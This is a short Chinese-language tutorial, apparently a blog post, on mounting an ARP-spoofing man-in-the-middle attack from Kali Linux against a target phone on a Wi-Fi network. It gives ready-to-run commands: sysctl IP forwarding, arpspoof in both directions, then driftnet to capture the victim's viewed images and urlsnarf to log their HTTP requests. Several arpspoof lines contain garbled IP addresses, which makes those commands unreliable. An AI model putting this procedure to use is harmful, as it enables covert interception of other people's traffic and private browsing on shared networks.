测试环境
路由器:192.168.1.1
kali 虚拟机:192.168.1.103 网卡接口:wlan0
目标手机IP : 192.168.1.106
攻击环境图示
测试过程
1、Linux开启路由转发功能
sysctl -w net.ipv4.ip_forward=1 #1开启,0禁用
注意:这一步是攻击的前提如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处)
2、arpspoof -监督从目标-路由的数据包
arpspoof -i wlan0 -t 192.168.1.106 92.168.1. 1 //-t后面跟(目标ip 目标路由)
3、arpspoof -拦截来自路由的数据包(新开一个终端)
arpspoof -i wlan0 -t 192.168.1. 92.168.1. 106 //-t后面跟(路由 目标ip)
如你所见, 它与上一步的命令相同, 但是我们切换了参数的位置。到目前为止, 你已经渗透到受害者与路由器之间的连接,已经成功建立了中间人攻击的连接。
4、Driftnet获取流量浏览图片
driftnet -i wlan0 # 【获取流量浏览图片】
Driftnet是一个程序, 它侦听网络流量并从其观察到的TCP流中提取图像。在看到大量网络流量的主机上运行很有趣。启动漂流网并查看用户在网站上看到的图像的
5、urlsnarf嗅探URL信息
urlsnarf -i wlan0 #通用日志格式”嗅探HTTP请求
注意:攻击的前提如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处
网友评论